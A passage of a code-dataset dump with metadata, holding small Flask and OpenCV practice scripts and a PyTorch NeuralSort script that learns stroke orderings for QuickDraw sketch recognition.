"sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3111, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 31, "dataset": "github-code", "pt": "53", "api": [{"api_name": "streamlit.set_page_config", "line_number": 5, "usage_type": "call"}, {"api_name": "streamlit.sidebar.title", "line_number": 18, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 18, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 21, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 21, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 25, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 25, 
"usage_type": "attribute"}, {"api_name": "streamlit.sidebar.code", "line_number": 26, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 26, "usage_type": "attribute"}, {"api_name": "streamlit.title", "line_number": 27, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 29, "usage_type": "call"}, {"api_name": "streamlit.text_area", "line_number": 32, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 34, "usage_type": "call"}, {"api_name": "helper.get_summary", "line_number": 35, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 39, "usage_type": "call"}, {"api_name": "streamlit.code", "line_number": 40, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 41, "usage_type": "call"}, {"api_name": "streamlit.code", "line_number": 42, "usage_type": "call"}, {"api_name": "helper.spacy_rander", "line_number": 44, "usage_type": "call"}, {"api_name": "helper.spacy_rander", "line_number": 47, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 53, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 55, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 56, "usage_type": "call"}, {"api_name": "helper.fetch_news_links", "line_number": 58, "usage_type": "call"}, {"api_name": "helper.fetch_news", "line_number": 59, "usage_type": "name"}, {"api_name": "streamlit.columns", "line_number": 62, "usage_type": "call"}, {"api_name": "streamlit.image", "line_number": 67, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 68, "usage_type": "call"}, {"api_name": "streamlit.expander", "line_number": 69, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 70, "usage_type": "call"}, {"api_name": "helper.get_summary", "line_number": 70, "usage_type": "call"}, {"api_name": "helper.fetch_news", "line_number": 70, "usage_type": "name"}, {"api_name": "streamlit.markdown", "line_number": 71, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 72, "usage_type": "call"}, {"api_name": "streamlit.image", "line_number": 77, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 78, "usage_type": "call"}, {"api_name": "streamlit.expander", "line_number": 79, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 80, "usage_type": "call"}, {"api_name": "helper.get_summary", "line_number": 80, "usage_type": "call"}, {"api_name": "helper.fetch_news", "line_number": 80, "usage_type": "name"}, {"api_name": "streamlit.markdown", "line_number": 81, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 82, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 85, "usage_type": "call"}]}
+{"seq_id": "73710723689", "text": "from flask import Flask, render_template\napp = Flask(__name__)\n\n@app.route('/characters')\ndef characters():\n c_list = [\n {\n \"name\": \"Thanos\",\n \"image\": \"https://www.sideshowtoy.com/wp-content/uploads/2018/04/marvel-avengers-infinity-war-thanos-sixth-scale-figure-hot-toys-feature-903429-1.jpg\",\n \"link\": \"https://en.wikipedia.org/wiki/Thanos\"\n },\n {\n \"name\": \"Captain America\",\n \"image\": \"http://assets.readbrightly.com/wp-content/uploads/2016/05/captain-america-feat.jpg\",\n \"link\": \"https://en.wikipedia.org/wiki/Captain_America\"\n },\n {\n \"name\": \"Spiderman\",\n \"image\": \"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT7YdZvjUvsdf-D96Do5bDOTjZWybL1-0h-0-ET7FDcU5eSUUTV7Q\",\n \"link\": \"https://en.wikipedia.org/wiki/Spider-Man\"\n }\n ]\n return render_template(\"character_list.html\",\n character_list=c_list)\n\n@app.route('/names')\ndef names():\n name_list = [\"Huy\", \"Quoc\", \"Huong\", \"Tung\"]\n return render_template(\"name.html\",\n name_list=name_list)\n\nfood_list = [\n {\n \"name\": \"Bún riêu\",\n \"image\": \"https://tea-1.lozi.vn/v1/images/resized/bun-rieu-cua-134109-1449025952?w=960&type=o\",\n \"link\": \"https://lozi.vn/b/ngo-55-hai-ba-trung-1449025952?utm_campaign=copy\",\n \"ytid\": \"rYD0fh7L1r4\"\n },\n {\n \"name\": \"Bún đậu mắm tôm\",\n \"image\": \"https://images.foody.vn/res/g3/28879/prof/s576x330/foody-mobile-bun-dau-viet-ha-noi.jpg\",\n \"link\": \"https://www.foody.vn/ha-noi/bun-dau-viet\",\n \"ytid\": \"jWYCxomF7lo\"\n },\n {\n \"name\": \"Bún ngan\",\n \"image\": \"https://images.foody.vn/res/g70/693326/prof/s576x330/foody-mobile-22045769_11798535521-134-636431573959949453.jpg\",\n \"link\": \"https://www.foody.vn/ha-noi/ba-hang-bun-ngan-bun-tron\",\n \"ytid\": \"rHbHunacl0\"\n }\n ]\n \n@app.route('/food_items')\ndef food_items():\n return render_template(\"food.html\",\n food_list=food_list)\n\n@app.route('/food_detail/')\ndef food_detail(index):\n food = food_list[index]\n return render_template('food_detail.html',\n food = food)\n\nif __name__ == '__main__':\n app.run(debug=True)", "repo_name": "harleyng/nguyenlethanhha-webmodule-c4e24", "sub_path": "web2/class/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2286, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 2, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 29, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}]}
+{"seq_id": "2184055362", "text": "import cv2 as cv\n\nimg = cv.imread(\"../Resources/pikachu.png\")\nprint(img.shape) # (height, width) to get the size of the image\n\nimgResize = cv.resize(img,(350,300)) # (width, height) to resize the image.\nprint(imgResize.shape)\n\nimgCropped = img[50:250, 10:300] # (height, width) to crop the image\nprint(imgCropped.shape)\n\ncv.imshow(\"Original\", img)\ncv.imshow(\"Resize\", imgResize)\ncv.imshow(\"Cropped\", imgCropped)\ncv.waitKey(0)", "repo_name": "Sreythou/OpenCVPython", "sub_path": "practice/resize_crop_image.py", "file_name": "resize_crop_image.py", "file_ext": "py", "file_size_in_byte": 432, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.imread", "line_number": 3, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "15385539775", "text": "from flask import Flask, jsonify, request\r\nfrom flask_cors import CORS\r\nfrom datetime import datetime\r\nimport statistics as stats\r\n\r\napp = Flask(__name__)\r\nCORS(app)\r\n\r\ntipo_medicion = { 'sensor' : 'DS18B20', 'variable' : 'Temperatura', 'unidades' : 'Centigrados'}\r\n\r\nmediciones = [\r\n {'fecha' : '2019-08-20 15:38:43', **tipo_medicion, 'valor' : 100},\r\n {'fecha' : '2019-08-20 15:40:56', **tipo_medicion, 'valor' : 98},\r\n {'fecha' : '2019-08-20 15:41:16', **tipo_medicion, 'valor' : 101},\r\n {'fecha' : '2019-08-20 15:43:18', **tipo_medicion, 'valor' : 101}, \r\n {'fecha' : '2019-08-20 15:46:16', **tipo_medicion, 'valor' : 98}, \r\n {'fecha' : '2019-08-20 15:50:20', **tipo_medicion, 'valor' : 98}, \r\n {'fecha' : '2019-08-20 16:01:16', **tipo_medicion, 'valor' : 99},\r\n {'fecha' : '2019-08-20 16:03:18', **tipo_medicion, 'valor' : 97},\r\n {'fecha' : '2019-08-20 16:08:20', **tipo_medicion, 'valor' : 97}, \r\n {'fecha' : '2019-08-21 16:14:16', **tipo_medicion, 'valor' : 97},\r\n {'fecha' : '2019-08-21 16:23:18', **tipo_medicion, 'valor' : 97},\r\n {'fecha' : '2019-08-21 16:26:18', **tipo_medicion, 'valor' : 96}\r\n]\r\n\r\n@app.route(\"/\")\r\ndef get():\r\n return jsonify(tipo_medicion)\r\n\r\n\r\n@app.route('/mediciones', methods = ['GET'])\r\ndef getAll():\r\n return jsonify(mediciones)\r\n\r\n\r\n@app.route('/mediciones', methods = ['POST'])\r\ndef postOne():\r\n now = datetime.now()\r\n body = request.json\r\n body['fecha'] = datetime.strftime(now, '%Y-%m-%d %H:%M:%S')\r\n mediciones.append({**body, **tipo_medicion})\r\n return jsonify(mediciones)\r\n\r\n\"\"\"\r\n@app.route('mediciones/', methods=['DELETE'])\r\ndef deleteOne(fecha):\r\n x = False\r\n for medicion in mediciones:\r\n if (fecha in medicion['fecha']):\r\n x = True\r\n mediciones.remove(medicion)\r\n return 'Eliminado' if x else \"No Encontrado\"\r\n\r\n\r\n@app.route('/mediciones/', methods=['PUT'])\r\ndef putOne(fecha):\r\n body = request.json\r\n x = False\r\n for medicion in mediciones:\r\n if(fecha in medicion['fecha']):\r\n x = True\r\n medicion['valor'] = body['valor']\r\n return 'Modificado' if x else 'No Encontrado'\r\n\"\"\" \r\n\r\n@app.route('/mediciones/moda', methods = ['GET'])\r\ndef getModa():\r\n moda = []\r\n x = 0\r\n for medicion in mediciones:\r\n moda.append(medicion['valor'])\r\n \r\n x = stats.mode(moda)\r\n return jsonify(x)\r\n\r\n \r\n\r\n\r\napp.run(port=5000, debug=True)\r\n\r\n\r\n", "repo_name": "jflondonog/ProyectoIntegrador1", "sub_path": "EverGreen.py", "file_name": "EverGreen.py", "file_ext": "py", "file_size_in_byte": 2471, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 42, 
"usage_type": "call"}, {"api_name": "statistics.mode", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 74, "usage_type": "call"}]}
+{"seq_id": "70806160808", "text": "import torch, os, random, numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.nn.utils.rnn import pad_sequence, pack_padded_sequence\nfrom torch.utils import tensorboard as tb\n\nfrom quickdraw.quickdraw import QuickDraw\nfrom models import Embedder, ScoreFunction, SketchANet\nfrom utils import rasterize, incr_ratserize, prerender_stroke, accept_withinfg_strokes, permuter\nfrom utils import listofindex, subset\nfrom npz import NPZWriter, MetricWriter\n\ndef analyse(embedder, perm, savefile, device, n_strokes):\n # create visualizations of the model prediction\n\n p_eye = torch.eye(n_strokes, device=device) # for input-order\n \n figtest, axtest = plt.subplots(n_strokes, 4)\n figtest.set_figheight(10)\n figtest.set_figwidth(10)\n\n for q, p in enumerate([p_eye, perm]): # 'perm' is the permutation from the model\n perms = []\n for i in range(1, n_strokes + 1):\n p_ = p[:i]\n perms.append( embedder.sandwitch(perm=p_) )\n all_perms = torch.cat(perms, 0)\n preds = embedder.encoder(all_perms, feature=False)\n preds = torch.softmax(preds, 1)\n\n for i in range(n_strokes):\n img = all_perms[i,...].squeeze().cpu().numpy()\n pred = preds[i,...].squeeze().cpu().numpy()\n axtest[i,0 if q==0 else 2].imshow(img)\n axtest[i,0 if q==0 else 2].axis('off')\n axtest[i,1 if q==0 else 3].stem(pred, use_line_collection=True)\n axtest[i,1 if q==0 else 3].axis('off')\n\n axtest[0,0].set_title('Original Order')\n axtest[0,1].set_title('Classif. score')\n axtest[0,2].set_title('Model output')\n axtest[0,3].set_title('Classif. score')\n\n figtest.savefig(savefile)\n plt.close(figtest)\n\ndef deterministic_neural_sort(s, tau):\n device = s.device # Detect the device type of the score 's'\n \n n = s.size()[1]\n one = torch.ones((n, 1), device=device)\n A_s = torch.abs(s - s.permute(0, 2, 1))\n B = torch.matmul(A_s, torch.matmul(one, torch.transpose(one, 0, 1)))\n scaling = (n + 1 - 2 * (torch.arange(n, dtype=s.dtype, device=device) + 1))\n C = torch.matmul(s, scaling.unsqueeze(0))\n P_max = (C-B).permute(0, 2, 1)\n sm = torch.nn.Softmax(-1)\n P_hat = sm(P_max / tau)\n \n return P_hat\n\ndef stochastic_neural_sort(s, tau):\n ''' The core NeuralSort algorithm '''\n\n def sample_gumbel(samples_shape, device, dtype=torch.float32, eps = 1e-10):\n U = torch.rand(samples_shape, device=device, dtype=dtype)\n return -torch.log(-torch.log(U + eps) + eps)\n \n batch_size, n, _ = s.size()\n log_s_perturb = torch.log(s) + sample_gumbel([batch_size, n, 1], s.device, s.dtype)\n log_s_perturb = log_s_perturb.view(batch_size, n, 1)\n P_hat = deterministic_neural_sort(log_s_perturb, tau)\n P_hat = P_hat.view(batch_size, n, n)\n \n return P_hat\n\ndef greedy(stroke_list, classifier, label, fig, device):\n perm_stroke_list = []\n perm_stroke_idx_list = []\n for _ in range(len(stroke_list)):\n best_score = 0.0\n best_stroke = None\n best_stroke_idx = None\n for i_stroke, stroke in enumerate(stroke_list):\n if i_stroke not in perm_stroke_idx_list:\n R = torch.tensor(rasterize([*perm_stroke_list, stroke], fig), device=device).unsqueeze(0).unsqueeze(0)\n acc = torch.softmax(classifier(R).squeeze(), 0)\n if acc[label] > best_score:\n best_score = acc[label]\n best_stroke = stroke\n best_stroke_idx = i_stroke\n perm_stroke_list.append(best_stroke)\n perm_stroke_idx_list.append(best_stroke_idx)\n return perm_stroke_list\n\n\ndef main( args ):\n all_classes = [ 'book', 'cat', 'chandelier', 'computer', 'cruise ship', 'face', 'flower', 'pineapple', 'sun',\n 'bicycle', 'binoculars', 'birthday cake', 
'guitar', 'windmill', 'piano', 'calculator', 'cow',\n 'truck', 'butterfly', 'mosquito' ]\n \n clf_classes = subset(all_classes, args.clf_classes)\n sort_classes = subset(all_classes, args.sort_classes)\n label_map = {}\n for si, s in enumerate(sort_classes):\n label_map[si] = clf_classes.index(s)\n\n qd = QuickDraw(args.root, categories=sort_classes, npz=args.npz,\n max_sketches_each_cat=args.max_sketches_each_cat, verbose=True, normalize_xy=False,\n mode=QuickDraw.STROKESET, filter_func=lambda s: accept_withinfg_strokes(s, args.min_strokes, args.max_strokes))\n \n # qdtrain, qdtest = qd.split(0.98)\n qdltrain = qd.get_dataloader(args.batch_size)\n qdltest = qd.get_dataloader(1)\n\n writer = tb.SummaryWriter(os.path.join(args.base, 'logs', args.tag))\n \n sketchclf = SketchANet(len(clf_classes))\n if os.path.exists(os.path.join(args.base, args.embmodel)):\n sketchclf.load_state_dict(torch.load(os.path.join(args.base, args.embmodel)))\n else:\n raise FileNotFoundError('args.embmodel not found')\n\n if torch.cuda.is_available():\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n\n # score function\n score = ScoreFunction(args.embdim + args.embdim)\n score = score.to(device)\n score_model_path = os.path.join(args.base, args.modelname)\n if os.path.exists(score_model_path):\n score.load_state_dict(torch.load(score_model_path))\n skip_train = True\n print('model found; skipping training')\n else:\n skip_train = False\n \n sketchclf = sketchclf.to(device)\n sketchclf.eval() # just as a guiding signal\n\n # loss function\n xentropy = torch.nn.CrossEntropyLoss()\n\n # optimizer\n optim = torch.optim.Adam(score.parameters(), lr=args.lr)\n # sched = torch.optim.lr_scheduler.StepLR(optim, step_size=1, gamma=0.75)\n canvas = plt.figure(frameon=False, figsize=(2.25, 2.25))\n\n count = 0\n\n for e in range(args.epochs):\n \n ####### The NPZ Writer\n if args.producenpz:\n npzwriter = NPZWriter(os.path.join(args.base, f'e{e}_' + args.npzfile))\n ####### The Metric Writer\n if args.metric:\n metricwriter = MetricWriter(os.path.join(args.base, f'e{e}_' + args.metricfile))\n \n score.train()\n for iteration, B in enumerate(qdltrain):\n if skip_train:\n break\n try:\n with torch.autograd.detect_anomaly():\n all_preds, all_labels = [], []\n for stroke_list, label in B:\n random.shuffle(stroke_list) # randomize the stroke order\n label = label_map[label] # label mapping\n\n # separate stroke-count for separate samples;\n # this is no longer provided by user\n n_strokes = len(stroke_list)\n\n raster_strokes = prerender_stroke(stroke_list, canvas)\n if torch.cuda.is_available():\n raster_strokes = raster_strokes.cuda()\n\n embedder = Embedder(sketchclf, raster_strokes, device=device)\n aug = embedder.get_aug_embeddings()\n\n scores = score(aug)\n \n p_relaxed = stochastic_neural_sort(scores.unsqueeze(0), 1 / (1 + e**0.5))\n p_discrete = torch.zeros((1, n_strokes, n_strokes), dtype=torch.float32, device=device)\n p_discrete[torch.arange(1, device=device).view(-1, 1).repeat(1, n_strokes),\n torch.arange(n_strokes, device=device).view(1, -1).repeat(1, 1),\n torch.argmax(p_relaxed, dim=-1)] = 1\n \n # permutation matrix\n p = p_relaxed + p_discrete.detach() - p_relaxed.detach() # ST Gradient Estimator\n p = p.squeeze()\n\n perms = []\n for i in range(1, n_strokes + 1):\n p_ = p[:i]\n perms.append( embedder.sandwitch(perm=p_) )\n\n all_perms = torch.cat(perms, 0)\n preds = sketchclf(all_perms, feature=False) # as a classifier\n\n all_labels.append( torch.tensor(label, 
device=device).repeat(n_strokes) )\n all_preds.append(preds)\n\n all_preds = torch.cat(all_preds, dim=0)\n all_labels = torch.cat(all_labels, dim=0).flatten()\n \n loss = xentropy(all_preds, all_labels)\n\n if iteration % args.interval == 0:\n print(f'[Training] [{iteration}/{e}/{args.epochs}] -> Loss: {loss}')\n writer.add_scalar('Train loss', loss.item(), count)\n count += 1\n \n optim.zero_grad()\n loss.backward()\n optim.step()\n except:\n continue\n\n if not skip_train:\n torch.save(score.state_dict(), score_model_path)\n print('[Saved] {}'.format(args.modelname))\n else:\n print('[Saved] {}'.format('Skiped trained; saving not required'))\n\n # Evaluation time\n score.eval()\n with torch.no_grad():\n total, correct = 0, 0\n\n for i_batch, B in enumerate(qdltest):\n i_sample = i_batch\n\n stroke_list, label = B[0] # Just one sample in batch\n label = label_map[label] # label mapping\n\n # random.shuffle(stroke_list)\n\n # separate stroke-count for separate samples;\n # this is no longer provided by user\n n_strokes = len(stroke_list)\n\n raster_strokes = prerender_stroke(stroke_list, canvas)\n if torch.cuda.is_available():\n raster_strokes = raster_strokes.cuda()\n\n embedder = Embedder(sketchclf, raster_strokes, device=device)\n \n aug = embedder.get_aug_embeddings()\n scores = score(aug)\n \n p_relaxed = stochastic_neural_sort(scores.unsqueeze(0), 1 / (1 + e**0.5))\n p_discrete = torch.zeros((1, n_strokes, n_strokes), dtype=torch.float32, device=device)\n p_discrete[torch.arange(1, device=device).view(-1, 1).repeat(1, n_strokes),\n torch.arange(n_strokes, device=device).view(1, -1).repeat(1, 1),\n torch.argmax(p_relaxed, dim=-1)] = 1\n \n # permutation matrix\n p = p_relaxed + p_discrete.detach() - p_relaxed.detach() # ST Gradient Estimator\n p = p.squeeze()\n\n perm_stroke_list = permuter(stroke_list, p.argmax(1))\n\n if (i_sample < args.n_viz) and args.viz:\n savefile = os.path.join(args.base, 'logs', args.modelname + '_' + str(i_sample) + '.png')\n analyse(embedder, p, savefile, device, n_strokes)\n\n # prepare for writing\n if args.producenpz:\n npzwriter.add(perm_stroke_list)\n if i_sample % 500 == 0:\n npzwriter.flush()\n\n if args.metric and (i_sample < args.n_metric):\n rand_stroke_list = permuter(stroke_list, np.random.permutation(n_strokes).tolist())\n orig_stroke_list = stroke_list\n gred_stroke_list = greedy(stroke_list, sketchclf, label, canvas, device)\n\n rand_incr_rasters = incr_ratserize(rand_stroke_list, canvas)\n orig_incr_rasters = incr_ratserize(orig_stroke_list, canvas)\n perm_incr_rasters = incr_ratserize(perm_stroke_list, canvas)\n gred_incr_rasters = incr_ratserize(gred_stroke_list, canvas)\n\n if torch.cuda.is_available():\n rand_incr_rasters = rand_incr_rasters.cuda()\n orig_incr_rasters = orig_incr_rasters.cuda()\n perm_incr_rasters = perm_incr_rasters.cuda()\n gred_incr_rasters = gred_incr_rasters.cuda()\n\n rand = torch.softmax(sketchclf(rand_incr_rasters), 1)\n orig = torch.softmax(sketchclf(orig_incr_rasters), 1)\n pred = torch.softmax(sketchclf(perm_incr_rasters), 1)\n gred = torch.softmax(sketchclf(gred_incr_rasters), 1)\n metricwriter.add(rand[:,label].unsqueeze(1).cpu().numpy(),\n orig[:,label].unsqueeze(1).cpu().numpy(),\n pred[:,label].unsqueeze(1).cpu().numpy(),\n gred[:,label].unsqueeze(1).cpu().numpy())\n print(f'{i_sample}/{args.n_metric} metric written')\n\n if i_sample % 50 == 0:\n metricwriter.flush()\n\n orig = (orig.argmax(1) == label).nonzero()\n pred = (pred.argmax(1) == label).nonzero()\n\n total += 1\n if orig.numel() == 0:\n if 
pred.numel() > 0:\n correct += 1\n else:\n total -= 1\n else:\n if pred.numel() > 0:\n if pred[0] <= orig[0]:\n correct += 1\n \n # print efficiency\n if args.metric:\n efficiency = float(correct) / total\n print('[Efficiency] {}/{} == {}'.format(correct, total, efficiency))\n writer.add_scalar(\"Efficiency\", efficiency, global_step=e)\n metricwriter.flush()\n\n if args.producenpz:\n npzwriter.flush()\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--base', type=str, required=False, default='.', help='base path')\n parser.add_argument('--root', type=str, required=True, help='QuickDraw folder path (containing .bin files)')\n parser.add_argument('--npz', action='store_true', help='use .npz files (if not, .bin files)')\n parser.add_argument('--max_sketches_each_cat', '-n', type=int, required=False, default=15000, help='Max no. of sketches each category')\n parser.add_argument('--embmodel', type=str, required=True, help='Embedding model (pre-trained) file')\n parser.add_argument('--embdim', type=int, required=False, default=512, help='latent dim in the embedding model')\n parser.add_argument('-b', '--batch_size', type=int, required=False, default=16, help='batch size')\n parser.add_argument('-i', '--interval', type=int, required=False, default=10, help='Logging interval')\n parser.add_argument('--lr', type=float, required=False, default=1e-4, help='Learning rate')\n parser.add_argument('-e', '--epochs', type=int, required=False, default=10, help='no. of epochs')\n parser.add_argument('-f', '--max_strokes', type=int, required=False, default=10, help='max no. of strokes')\n parser.add_argument('-g', '--min_strokes', type=int, required=False, default=7, help='min no. of strokes')\n parser.add_argument('-c', '--clf_classes', type=listofindex, required=True, help='List of class indecies in the classifier')\n parser.add_argument('-s', '--sort_classes', type=listofindex, required=True, help='List of class indecies in the neuralsort')\n parser.add_argument('-m', '--modelname', type=str, required=True, help='name of the model')\n parser.add_argument('--tag', type=str, required=True, help='a tag for recognizing model in TB')\n parser.add_argument('--viz', action='store_true', help='want visualizations?')\n parser.add_argument('--n_viz', '-z', type=int, required=False, default=25, help='How many samples to visualize')\n parser.add_argument('--n_metric', type=int, required=False, default=1000, help='How many samples to use for metric calc')\n parser.add_argument('--producenpz', action='store_true', help='want to produce .npz file ?')\n parser.add_argument('--npzfile', type=str, required=False, default='output.npz', help='NPZ file name')\n parser.add_argument('--metric', action='store_true', help='compute metric (early recog.) 
?')\n parser.add_argument('--metricfile', type=str, required=False, default='metric.npz', )\n args = parser.parse_args()\n\n main( args )\n ", "repo_name": "dasayan05/neuralsort-siggraph", "sub_path": "strokesort.py", "file_name": "strokesort.py", "file_ext": "py", "file_size_in_byte": 16568, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.eye", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "attribute"}, {"api_name": "torch.float32", "line_number": 64, "usage_type": "attribute"}, {"api_name": "torch.rand", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 85, "usage_type": "call"}, {"api_name": "utils.rasterize", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 86, "usage_type": "call"}, {"api_name": "utils.subset", "line_number": 101, "usage_type": "call"}, {"api_name": "utils.subset", "line_number": 102, "usage_type": "call"}, {"api_name": "quickdraw.quickdraw.QuickDraw", "line_number": 107, "usage_type": "call"}, {"api_name": "quickdraw.quickdraw.QuickDraw.STROKESET", "line_number": 109, "usage_type": "attribute"}, {"api_name": "quickdraw.quickdraw.QuickDraw", "line_number": 109, "usage_type": "name"}, {"api_name": "utils.accept_withinfg_strokes", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.utils.tensorboard", "line_number": 115, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "models.SketchANet", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "torch.cuda.is_available", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 123, "usage_type": "attribute"}, {"api_name": "torch.device", 
"line_number": 124, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 126, "usage_type": "call"}, {"api_name": "models.ScoreFunction", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 143, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 146, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "npz.NPZWriter", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path", "line_number": 156, "usage_type": "attribute"}, {"api_name": "npz.MetricWriter", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "torch.autograd.detect_anomaly", "line_number": 166, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 166, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 169, "usage_type": "call"}, {"api_name": "utils.prerender_stroke", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 177, "usage_type": "attribute"}, {"api_name": "models.Embedder", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 186, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 200, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 203, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 206, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 230, "usage_type": "call"}, {"api_name": "utils.prerender_stroke", "line_number": 245, "usage_type": "call"}, {"api_name": 